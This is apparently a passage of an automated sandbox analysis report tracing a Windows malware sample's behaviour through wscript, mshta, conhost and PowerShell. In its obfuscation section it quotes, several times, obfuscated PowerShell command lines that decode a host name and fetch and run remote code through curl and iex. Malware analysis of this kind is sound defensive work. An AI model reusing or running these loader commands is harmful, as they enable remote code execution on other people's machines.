          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tomation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdby source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdbb< source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdbntVersion source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AFA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \mscorlib.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbZ& source: powershell.exe, 0000000F.00000002.1986024982.0000021C27CA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb4 source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb` source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ows\System.Core.pdbpdb` source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatP source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986251858.0000021C27CE3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbK source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\System32\conhost.exe conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp)Jump to behavior
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv)Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_0578EAB1 push dword ptr [eax]; ret 7_2_0578EB3E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B7E201D pushad ; retf 17_2_00007FFD9B7E23E1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B7E815B push ebx; ret 17_2_00007FFD9B7E816A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B7E00BD pushad ; iretd 17_2_00007FFD9B7E00C1

          Persistence and Installation Behavior

          barindex
          Creates processes via WMI
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
